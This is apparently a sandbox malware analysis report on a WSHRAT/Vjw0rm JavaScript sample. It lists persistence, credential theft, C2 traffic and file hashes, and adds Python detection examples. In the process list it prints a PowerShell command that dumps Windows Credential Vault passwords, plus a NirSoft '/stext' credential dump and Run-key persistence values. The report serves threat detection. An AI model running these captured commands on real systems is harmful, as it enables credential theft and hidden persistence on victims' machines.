Malware Analysis Report

2025-01-18 12:21

Sample ID: 221101-j548ksadfk
Target: FCR22001306.js
SHA256: da581bea8917ae4b052e9978b8264b3257e06d80b2973c29e80cdf216a8640c4
Tags: vjw0rm wshrat collection persistence spyware stealer trojan worm
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V6
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

Score: 10/10
SHA256: da581bea8917ae4b052e9978b8264b3257e06d80b2973c29e80cdf216a8640c4
Threat Level: Known bad

The file FCR22001306.js was found to be: Known bad.

Malicious Activity Summary

Tags: vjw0rm wshrat collection persistence spyware stealer trojan worm

Triggered signatures:
WSHRAT
Vjw0rm
Nirsoft
NirSoft MailPassView
Executes dropped EXE
Blocklisted process makes network request
Drops startup file
Checks computer location settings
Reads user/profile data of web browsers
Adds Run key to start application
Accesses Microsoft Outlook accounts
Looks up external IP address via web service
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Script User-Agent
Kills process with taskkill
Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2022-11-01 08:16

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2022-11-01 08:16
Reported: 2022-11-01 08:18
Platform: win7-20220901-en
Max time kernel: 149s
Max time network: 155s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\FCR22001306.js

Signatures

Vjw0rm

trojan worm vjw0rm

WSHRAT

trojan wshrat

NirSoft MailPassView

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A (2 entries)

Nirsoft

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A (2 entries)

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cmdc.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cmdc.exe | N/A

Drops startup file

Description | Indicator | Process | Target
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FCR22001306.js | C:\Windows\system32\wscript.exe | N/A
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lzwNNcWAsq.js | C:\Windows\System32\wscript.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FCR22001306.js | C:\Windows\system32\wscript.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lzwNNcWAsq.js | C:\Windows\System32\wscript.exe | N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook accounts

collection
Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Users\Admin\AppData\Local\Temp\cmdc.exe | N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\software\microsoft\windows\currentversion\run | C:\Windows\system32\wscript.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\Run\FCR22001306 = wscript.exe //B "C:\Users\Admin\AppData\Local\Temp\FCR22001306.js" | C:\Windows\system32\wscript.exe | N/A
Key created | \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run | C:\Windows\system32\wscript.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FCR22001306 = wscript.exe //B "C:\Users\Admin\AppData\Local\Temp\FCR22001306.js" | C:\Windows\system32\wscript.exe | N/A
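The two persistence mechanisms recorded above (a copy of the script in the Startup folder, and HKCU plus HKLM Run values that launch wscript.exe //B on a .js in the user's Temp directory) are the pattern to hunt for on other hosts. The Python below is an added example, not part of this report or of the sandbox, that runs that check over constructed registry-set and file-create records in the shape Sysmon event ID 13 and 11 data usually takes; the field names and the benign filler records are this example's own assumptions, while the malicious paths and values are copied from the rows above.

```python
"""Flag script-host persistence of the kind recorded in this report.

Added example, not sandbox or report code. Event records are constructed;
field names are this example's own.
"""
import re
from typing import Dict, List

# Run / RunOnce keys under either hive (both HKCU and HKLM appear in the report).
RUN_KEY = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)
# Script hosts that execute whatever file is named on their command line.
SCRIPT_HOST = re.compile(r"\b(wscript|cscript|mshta)(\.exe)?\b", re.I)
# Extensions the Windows Script Host / mshta will run from a Startup folder.
SCRIPT_EXT = (".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta")
# Locations a standard user can write to without elevation.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Users\\Public|ProgramData)\\", re.I)
STARTUP_DIR = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I)


def check_run_value(ev: Dict) -> str:
    """Reason string if a Run value launches a script host on a user-writable path, else ''."""
    if ev["event"] != "RegistryValueSet" or not RUN_KEY.search(ev["target"]):
        return ""
    data = ev["details"]
    if SCRIPT_HOST.search(data) and USER_WRITABLE.search(data):
        # //B (batch mode) suppresses WSH error pop-ups, so the user sees nothing on login.
        quiet = " in batch mode (//B)" if "//B" in data.upper() else ""
        return f"Run value launches a script host from a user-writable path{quiet}"
    return ""


def check_startup_drop(ev: Dict) -> str:
    """Reason string if a script file is created inside a Startup folder, else ''."""
    if ev["event"] != "FileCreate" or not STARTUP_DIR.search(ev["target"]):
        return ""
    if ev["target"].lower().endswith(SCRIPT_EXT):
        return "script dropped into Startup folder"
    return ""


def find_script_persistence(events: List[Dict]) -> List[Dict]:
    """Run both checks over every event and collect the hits in event order."""
    findings = []
    for ev in events:
        for check in (check_run_value, check_startup_drop):
            reason = check(ev)
            if reason:
                findings.append({"pid": ev["pid"], "image": ev["image"],
                                 "target": ev["target"], "reason": reason})
    return findings


# Constructed events. The first and third carry the report's own paths and values;
# the other two are benign filler (a vendor tray app and a shortcut) to be ignored.
SAMPLE_EVENTS = [
    {"event": "RegistryValueSet", "pid": 1168, "image": r"C:\Windows\system32\wscript.exe",
     "target": r"\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\Run\FCR22001306",
     "details": r'wscript.exe //B "C:\Users\Admin\AppData\Local\Temp\FCR22001306.js"'},
    {"event": "RegistryValueSet", "pid": 3100, "image": r"C:\Program Files\Vendor\setup.exe",
     "target": r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorTray",
     "details": r'"C:\Program Files\Vendor\tray.exe" /minimized'},
    {"event": "FileCreate", "pid": 1360, "image": r"C:\Windows\System32\wscript.exe",
     "target": r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lzwNNcWAsq.js",
     "details": ""},
    {"event": "FileCreate", "pid": 2200, "image": r"C:\Windows\explorer.exe",
     "target": r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Notes.lnk",
     "details": ""},
]

if __name__ == "__main__":
    for f in find_script_persistence(SAMPLE_EVENTS):
        print(f'pid {f["pid"]} {f["image"]}: {f["reason"]} -> {f["target"]}')
```

The Run-value check keys on the combination of a script host and a user-writable path rather than on the value name, since the name (FCR22001306 here) changes per campaign while the launch pattern does not.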

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | ip-api.com | N/A | N/A

Enumerates physical storage devices

Kills process with taskkill

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A
N/A | N/A | C:\Windows\system32\taskkill.exe | N/A

Script User-Agent

Description: HTTP User-Agent header (4 identical entries)
Indicator: WSHRAT|94A7BB46|RYNKSFQE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 1/11/2022|JavaScript-v3.4|NL:Netherlands
Process: N/A
Target: N/A
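The User-Agent above is the WSHRAT check-in: a pipe-separated host fingerprint sent on every beacon, which makes it a cleaner proxy-log indicator than the C2 addresses (those change; the layout does not). The Python below is an added example, not part of this report or of any sandbox tooling, that parses the header into fields and runs the check over a few constructed proxy-log lines (the two WSHRAT values are the ones from this report's two runs; the other lines are made up). The field names are assumptions drawn from the Houdini/H-Worm lineage WSHRAT descends from; the report only shows the raw value, so treat them as labels rather than ground truth.

```python
"""Parse the WSHRAT check-in User-Agent and hunt for it in proxy logs.

Added example for this report, not sandbox or malware code. Field names are
assumptions based on the Houdini/H-Worm lineage; the report shows only the raw
header value.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Set, Tuple


@dataclass
class WshratBeacon:
    hwid: str          # assumed: volume serial / host ID (94A7BB46 in the report)
    hostname: str      # assumed: computer name (RYNKSFQE)
    username: str      # Admin
    os: str            # Microsoft Windows 7 Ultimate
    antivirus: str     # nan-av (no AV product found)
    usb_spread: bool   # assumed: the "false" in "false - 1/11/2022"
    install_date: str  # assumed: the "1/11/2022" in the same field
    version: str       # JavaScript-v3.4
    country: str       # NL:Netherlands


def parse_wshrat_ua(ua: str) -> Optional[WshratBeacon]:
    """Return a WshratBeacon for a WSHRAT-style User-Agent, else None.

    Layout seen in the report (10 pipe-separated fields):
      WSHRAT|<hwid>|<host>|<user>|<os>|plus|<av>|<usb> - <date>|<ver>|<cc:country>
    A value with the wrong field count is rejected rather than guessed at.
    """
    parts = [p.strip() for p in ua.split("|")]
    if len(parts) != 10 or parts[0] != "WSHRAT":
        return None
    usb_flag, _, install_date = parts[7].partition(" - ")
    return WshratBeacon(
        hwid=parts[1], hostname=parts[2], username=parts[3], os=parts[4],
        antivirus=parts[6], usb_spread=usb_flag.lower() == "true",
        install_date=install_date.strip(), version=parts[8], country=parts[9],
    )


# Constructed proxy-log excerpt: <timestamp> <client> <destination> "<user-agent>".
# The two WSHRAT values are copied from this report; everything else is made up.
SAMPLE_PROXY_LOG = """\
2022-11-01T08:17:02Z 10.0.0.5 172.93.220.135:2084 "WSHRAT|94A7BB46|RYNKSFQE|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 1/11/2022|JavaScript-v3.4|NL:Netherlands"
2022-11-01T08:17:03Z 10.0.0.5 208.95.112.1:80 "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1)"
2022-11-01T08:17:09Z 10.0.0.7 172.93.220.135:2084 "WSHRAT|18024990|TMKNGOMU|Admin|Microsoft Windows 10 Pro|plus|nan-av|false - 1/11/2022|JavaScript-v3.4|NL:Netherlands"
2022-11-01T08:17:10Z 10.0.0.8 203.0.113.9:443 "WSHRAT|broken|value"
"""

LOG_LINE = re.compile(r'^(?P<ts>\S+) (?P<src>\S+) (?P<dst>\S+) "(?P<ua>[^"]*)"$')


def find_wshrat_beacons(log_text: str) -> List[Tuple[str, str, WshratBeacon]]:
    """(client, destination, beacon) for every log line whose UA parses as WSHRAT."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        beacon = parse_wshrat_ua(m.group("ua"))
        if beacon is not None:
            hits.append((m.group("src"), m.group("dst"), beacon))
    return hits


def c2_destinations(hits: List[Tuple[str, str, WshratBeacon]]) -> Set[str]:
    """Unique destinations contacted with a WSHRAT UA: the candidate C2 set to block."""
    return {dst for _, dst, _ in hits}


if __name__ == "__main__":
    found = find_wshrat_beacons(SAMPLE_PROXY_LOG)
    for src, dst, b in found:
        print(f"{src} -> {dst}: host={b.hostname} user={b.username} os={b.os!r} "
              f"av={b.antivirus} ver={b.version} hwid={b.hwid}")
    print("block:", sorted(c2_destinations(found)))
```

The hwid field is the value to pivot on when several infected hosts report in: it stays constant per machine across C2 changes, whereas the hostname and username are what a sandbox randomises.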

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A

Suspicious use of WriteProcessMemory

Every row is a parent writing into one of its own children (the same parent/child pairs make up the Processes list below), which is what a parent does while setting up a process it has just created; none of the targets is a pre-existing, unrelated process, so this is not evidence of injection. Identical rows are collapsed and counted in the Events column.

Description | Indicator | Process | Target | Events
PID 1168 wrote to memory of 1360 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\wscript.exe | 3
PID 1168 wrote to memory of 1460 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | 3
PID 1168 wrote to memory of 1964 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\system32\cmd.exe | 3
PID 1964 wrote to memory of 1432 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\taskkill.exe | 3
PID 1168 wrote to memory of 1948 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\system32\cmd.exe | 3
PID 1948 wrote to memory of 764 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\taskkill.exe | 3
PID 1168 wrote to memory of 1368 | N/A | C:\Windows\system32\wscript.exe | C:\Users\Admin\AppData\Local\Temp\cmdc.exe | 4
PID 1168 wrote to memory of 748 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\system32\cmd.exe | 3
PID 748 wrote to memory of 868 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\taskkill.exe | 3
PID 1168 wrote to memory of 2008 | N/A | C:\Windows\system32\wscript.exe | C:\Users\Admin\AppData\Local\Temp\cmdc.exe | 4
PID 1168 wrote to memory of 1692 | N/A | C:\Windows\system32\wscript.exe | C:\Windows\system32\cmd.exe | 3

Processes

PIDs and nesting are taken from the WriteProcessMemory rows above (their target images match this list in order); each entry is the image followed by its command line.

1168  C:\Windows\system32\wscript.exe
      wscript.exe C:\Users\Admin\AppData\Local\Temp\FCR22001306.js
  1360  C:\Windows\System32\wscript.exe
        "C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\lzwNNcWAsq.js"
  1460  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -command [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } > "C:\Users\Admin\AppData\Local\Temp\tmp.txt"
  1964  C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
    1432  C:\Windows\system32\taskkill.exe
          taskkill /F /IM cmdc.exe
  1948  C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
    764   C:\Windows\system32\taskkill.exe
          taskkill /F /IM cmdc.exe
  1368  C:\Users\Admin\AppData\Local\Temp\cmdc.exe
        "C:\Users\Admin\AppData\Local\Temp\cmdc.exe" /stext C:\Users\Admin\AppData\Local\Temp\cmdc.exedata
  748   C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
    868   C:\Windows\system32\taskkill.exe
          taskkill /F /IM cmdc.exe
  2008  C:\Users\Admin\AppData\Local\Temp\cmdc.exe
        "C:\Users\Admin\AppData\Local\Temp\cmdc.exe" /stext C:\Users\Admin\AppData\Local\Temp\cmdc.exedata
  1692  C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c mkdir "C:\Users\Admin\AppData\Local\Temp\wshlogs"

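The process list above is the whole WSHRAT chain in one tree: a script host that spawns a second script host in batch mode, PowerShell dumping the Windows Credential Vault to tmp.txt, a dropped executable in Temp run with the NirSoft-style /stext output switch, and cmd.exe/taskkill cleanup of that tool between runs. The Python below is an added example, not part of this report, that rebuilds such a tree from constructed process-creation records (PIDs and command lines copied from this behavioral run, plus a benign explorer/notepad pair as filler) and flags every process that has a script host in its ancestry. The record field names and the parent PID of the root are this example's assumptions.

```python
"""Triage a process tree for the wscript-driven chain shown in this report.

Added example, not report or sandbox code. Events are constructed records
(pid, ppid, image, cmdline) in the shape EDR/Sysmon ID 1 data usually takes.
"""
import re
from typing import Dict, List, Tuple

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
LOLBINS = {"cmd.exe", "powershell.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe",
           "certutil.exe", "bitsadmin.exe"}
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Users\\Public|ProgramData)\\", re.I)
# NirSoft recovery tools write their output to a text file with "/stext <path>".
STEXT = re.compile(r"\s/stext\s", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def lineage(by_pid: Dict[int, Dict], pid: int) -> List[Dict]:
    """Ancestors of pid, nearest first (self excluded); stops on unknown ppid or a cycle."""
    chain, seen = [], set()
    pid = by_pid[pid]["ppid"]
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid]["ppid"]
    return chain


def classify(ev: Dict) -> str:
    """Why a process in a script-host chain is interesting; '' if it is not."""
    image, cmd = basename(ev["image"]), ev["cmdline"]
    if image == "powershell.exe" and "PasswordVault" in cmd:
        return "dumps Windows Credential Vault via PowerShell"
    if STEXT.search(cmd):
        return "NirSoft-style /stext credential dump"
    if image == "taskkill.exe":
        return "kills a process (tool cleanup)"
    if image in SCRIPT_HOSTS:
        where = " from a user-writable path" if USER_WRITABLE.search(cmd) else ""
        quiet = " in batch mode (//B)" if "//B" in cmd else ""
        return f"script host running a script{where}{quiet}"
    if USER_WRITABLE.search(ev["image"]):
        return "executable launched from a user-writable path"
    if image in LOLBINS:
        return "LOLBin spawned under a script host"
    return ""


def triage(events: List[Dict]) -> List[Tuple[int, str]]:
    """(pid, reason) for every process that is, or descends from, a script host."""
    by_pid = {e["pid"]: e for e in events}
    out = []
    for ev in events:
        own = basename(ev["image"]) in SCRIPT_HOSTS
        inherited = any(basename(p["image"]) in SCRIPT_HOSTS for p in lineage(by_pid, ev["pid"]))
        if own or inherited:
            reason = classify(ev)
            if reason:
                out.append((ev["pid"], reason))
    return out


def render_tree(events: List[Dict], root: int, depth: int = 0) -> List[str]:
    """Indented 'pid image' lines for root and its descendants, in event order."""
    by_pid = {e["pid"]: e for e in events}
    lines = [f'{"  " * depth}{root} {basename(by_pid[root]["image"])}']
    for e in events:
        if e["ppid"] == root and e["pid"] != root:
            lines.extend(render_tree(events, e["pid"], depth + 1))
    return lines


WS = r"C:\Windows\system32\wscript.exe"
CMD = r"C:\Windows\system32\cmd.exe"
TK = r"C:\Windows\system32\taskkill.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMDC = r"C:\Users\Admin\AppData\Local\Temp\cmdc.exe"
PS_CMD = (r'"' + PS + r'" -noprofile -command '
          r'[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] '
          r'$vault = New-Object Windows.Security.Credentials.PasswordVault '
          r'$vault.RetrieveAll() | % { $_.RetrievePassword();$_ } > "C:\Users\Admin\AppData\Local\Temp\tmp.txt"')

SAMPLE_PROCESS_EVENTS = [  # constructed; PIDs and command lines follow behavioral1
    {"pid": 600, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 1168, "ppid": 600, "image": WS, "cmdline": r"wscript.exe C:\Users\Admin\AppData\Local\Temp\FCR22001306.js"},
    {"pid": 1360, "ppid": 1168, "image": WS, "cmdline": r'"C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\lzwNNcWAsq.js"'},
    {"pid": 1460, "ppid": 1168, "image": PS, "cmdline": PS_CMD},
    {"pid": 1964, "ppid": 1168, "image": CMD, "cmdline": r'"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe'},
    {"pid": 1432, "ppid": 1964, "image": TK, "cmdline": "taskkill /F /IM cmdc.exe"},
    {"pid": 1368, "ppid": 1168, "image": CMDC, "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\cmdc.exe" /stext C:\Users\Admin\AppData\Local\Temp\cmdc.exedata'},
    {"pid": 1692, "ppid": 1168, "image": CMD, "cmdline": r'"C:\Windows\system32\cmd.exe" /c mkdir "C:\Users\Admin\AppData\Local\Temp\wshlogs"'},
    {"pid": 2300, "ppid": 600, "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},  # benign
]

if __name__ == "__main__":
    print("\n".join(render_tree(SAMPLE_PROCESS_EVENTS, 600)))
    for pid, why in triage(SAMPLE_PROCESS_EVENTS):
        print(pid, why)
```

Ancestry rather than direct parentage is what matters here: taskkill.exe is two hops from wscript.exe (via cmd.exe), and a rule that only looks at the immediate parent misses it.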
Network

Identical rows collapsed; Connections is the number of times the row appeared.

Country | Destination | Domain | Proto | Connections
US | 8.8.8.8:53 | javaautorun.duia.ro | udp | 1
US | 8.8.8.8:53 | ip-api.com | udp | 1
US | 208.95.112.1:80 | ip-api.com | tcp | 1
NG | 41.217.12.189:5465 | javaautorun.duia.ro | tcp | 5
US | 8.8.8.8:53 | egodds.longmusic.com | udp | 1
JP | 172.93.220.135:2084 | egodds.longmusic.com | tcp | 17
US | 8.8.8.8:53 | wshsoft.company | udp | 1
SG | 194.59.164.67:80 | wshsoft.company | tcp | 1
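The raw Network table carries one row per connection, so the beaconing destinations only stand out once identical rows are collapsed and the resolver and geolocation traffic are set aside. The Python below is an added example, not sandbox output, that takes the behavioral1 rows as pasted text, separates DNS lookups and the public ip-api.com IP check from the TCP sessions, and emits per-destination counts and a blocklist ordered by contact frequency. Treating 8.8.8.8:53 as the sandbox resolver and ip-api.com as non-attacker infrastructure is this example's assumption, as is the three-field handling of rows that carry no domain (behavioral2 has two such rows).

```python
"""Collapse a flattened sandbox Network table into IOCs and beacon counts.

Added example, not part of the sandbox tooling. BEHAVIORAL1_NETWORK is the
behavioral1 Network table of this report, pasted as text.
"""
from collections import Counter
from typing import Dict, List, NamedTuple

# Destinations that are not the attacker's infrastructure (assumption for this example):
# the sandbox's DNS resolver and the public IP-geolocation API the script queries.
RESOLVERS = {"8.8.8.8:53"}
IP_CHECK_SERVICES = {"ip-api.com"}


class Row(NamedTuple):
    country: str
    destination: str   # ip:port
    domain: str        # "" when the report row carries no name
    proto: str


def parse_rows(table: str) -> List[Row]:
    """Parse 'Country Destination [Domain] Proto' lines; the domain column may be absent."""
    rows = []
    for line in table.strip().splitlines():
        fields = line.split()
        if len(fields) == 4:
            rows.append(Row(*fields))
        elif len(fields) == 3:          # e.g. "GB 51.132.193.104:443 tcp"
            rows.append(Row(fields[0], fields[1], "", fields[2]))
    return rows


def summarize(rows: List[Row]) -> Dict[str, object]:
    """Split rows into DNS lookups, likely C2 sessions (counted) and known-service noise."""
    sessions: Counter = Counter()
    lookups, noise = set(), set()
    for r in rows:
        if r.destination in RESOLVERS and r.proto == "udp":
            lookups.add(r.domain)
        elif r.domain in IP_CHECK_SERVICES:
            noise.add(r.destination)
        else:
            sessions[(r.domain or "-", r.destination)] += 1
    return {"lookups": lookups, "sessions": sessions, "noise": noise}


def blocklist(rows: List[Row]) -> List[str]:
    """Domains and ip:port pairs worth blocking, most-contacted first."""
    out: List[str] = []
    for (domain, dest), _ in summarize(rows)["sessions"].most_common():
        if domain != "-" and domain not in out:
            out.append(domain)
        out.append(dest)
    return out


BEHAVIORAL1_NETWORK = """
US 8.8.8.8:53 javaautorun.duia.ro udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
NG 41.217.12.189:5465 javaautorun.duia.ro tcp
US 8.8.8.8:53 egodds.longmusic.com udp
JP 172.93.220.135:2084 egodds.longmusic.com tcp
JP 172.93.220.135:2084 egodds.longmusic.com tcp
JP 172.93.220.135:2084 egodds.longmusic.com tcp
JP 172.93.220.135:2084 egodds.longmusic.com tcp
US 8.8.8.8:53 wshsoft.company udp
SG 194.59.164.67:80 wshsoft.company tcp
NG 41.217.12.189:5465 javaautorun.duia.ro tcp
NG 41.217.12.189:5465 javaautorun.duia.ro tcp
JP 172.93.220.135:2084 egodds.longmusic.com tcp
JP 172.93.220.135:2084 egodds.longmusic.com tcp
JP 172.93.220.135:2084 egodds.longmusic.com tcp
JP 172.93.220.135:2084 egodds.longmusic.com tcp
JP 172.93.220.135:2084 egodds.longmusic.com tcp
NG 41.217.12.189:5465 javaautorun.duia.ro tcp
JP 172.93.220.135:2084 egodds.longmusic.com tcp
JP 172.93.220.135:2084 egodds.longmusic.com tcp
JP 172.93.220.135:2084 egodds.longmusic.com tcp
JP 172.93.220.135:2084 egodds.longmusic.com tcp
JP 172.93.220.135:2084 egodds.longmusic.com tcp
NG 41.217.12.189:5465 javaautorun.duia.ro tcp
JP 172.93.220.135:2084 egodds.longmusic.com tcp
JP 172.93.220.135:2084 egodds.longmusic.com tcp
JP 172.93.220.135:2084 egodds.longmusic.com tcp
"""

if __name__ == "__main__":
    s = summarize(parse_rows(BEHAVIORAL1_NETWORK))
    for (domain, dest), n in s["sessions"].most_common():
        print(f"{n:3d}x {domain} {dest}")
    print("lookups:", sorted(s["lookups"]), "noise:", sorted(s["noise"]))
    print("block:", blocklist(parse_rows(BEHAVIORAL1_NETWORK)))
```

The session count is the detection-relevant number: seventeen connections to 172.93.220.135:2084 inside a 155-second network window is a short-interval beacon, which is what a NetFlow or proxy query should look for once the domain has rotated.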

Files

memory/1168-54-0x000007FEFBBF1000-0x000007FEFBBF3000-memory.dmp

memory/1360-55-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\lzwNNcWAsq.js

MD5 18aa18aca1d624556d87fd1c3c8dfc4a
SHA1 45509a074cd5f5d11d507a7fe0bcb733f874e90d
SHA256 27765e27d897d45fb5cc093197a65545ed4a120130e12cc88e70f41e68788036
SHA512 80e7fcc1551290772a960b76445999f85f5cbef24cf2b860c7d8e0e7ea1a2a284e8b120a203947c2e8f2cdff13193095c00922e6f7e7cc94069e8846bad4554a

memory/1460-58-0x0000000000000000-mapping.dmp

memory/1460-60-0x000007FEF3840000-0x000007FEF4263000-memory.dmp

memory/1460-62-0x00000000027D4000-0x00000000027D7000-memory.dmp

memory/1460-61-0x000007FEF2650000-0x000007FEF31AD000-memory.dmp

memory/1460-63-0x000000001B720000-0x000000001BA1F000-memory.dmp

memory/1460-64-0x00000000027D4000-0x00000000027D7000-memory.dmp

memory/1460-65-0x00000000027DB000-0x00000000027FA000-memory.dmp

memory/1964-66-0x0000000000000000-mapping.dmp

memory/1432-67-0x0000000000000000-mapping.dmp

memory/1948-68-0x0000000000000000-mapping.dmp

memory/764-69-0x0000000000000000-mapping.dmp

memory/1368-70-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\cmdc.exe

MD5 54e8ded7b148a13d3363ac7b33f6eb06
SHA1 63dcbe2db9cc14564eb84d5e953f2f9f5c54acd9
SHA256 400b411a9bffd687c5e74f51d43b7dc92cdb8d5ca9f674456b75a5d37587d342
SHA512 bf6d047bb55150b2369bdd7dfea9c815894af2e05e5b45f2eedf67d5d6a9569189ee495870fddf334a173a4beed62d2a08807c000d4c47339ac76b760b4ae349

memory/1368-72-0x00000000760E1000-0x00000000760E3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cmdc.cfg

MD5 70e69155b8080b5db35191ab8426d084
SHA1 383deaaee90ce71b28b0a6e22124e77aa1cccf8b
SHA256 104e0212403148a018258ef005a64ec73f0a148dbee230cb5c91dd691d03aefe
SHA512 c718c69454e4d9bcac24c918bf4c7f05ab93910b8a4701bd1dc914a9ca13dffe5f083f30881b5796d239c11be2f8b3e38a7e2ac7dcabc3d9810f59d9228bf342

memory/748-74-0x0000000000000000-mapping.dmp

memory/868-75-0x0000000000000000-mapping.dmp

memory/2008-76-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\cmdc.exe

MD5 54e8ded7b148a13d3363ac7b33f6eb06
SHA1 63dcbe2db9cc14564eb84d5e953f2f9f5c54acd9
SHA256 400b411a9bffd687c5e74f51d43b7dc92cdb8d5ca9f674456b75a5d37587d342
SHA512 bf6d047bb55150b2369bdd7dfea9c815894af2e05e5b45f2eedf67d5d6a9569189ee495870fddf334a173a4beed62d2a08807c000d4c47339ac76b760b4ae349

memory/1692-79-0x0000000000000000-mapping.dmp

Analysis: behavioral2

Detonation Overview

Submitted: 2022-11-01 08:16
Reported: 2022-11-01 08:18
Platform: win10v2004-20220812-en
Max time kernel: 71s
Max time network: 152s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\FCR22001306.js

Signatures

Vjw0rm

trojan worm vjw0rm

WSHRAT

trojan wshrat

NirSoft MailPassView

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A (2 entries)

Nirsoft

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A (2 entries)

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\wscript.exe | N/A

Drops startup file

Description | Indicator | Process | Target
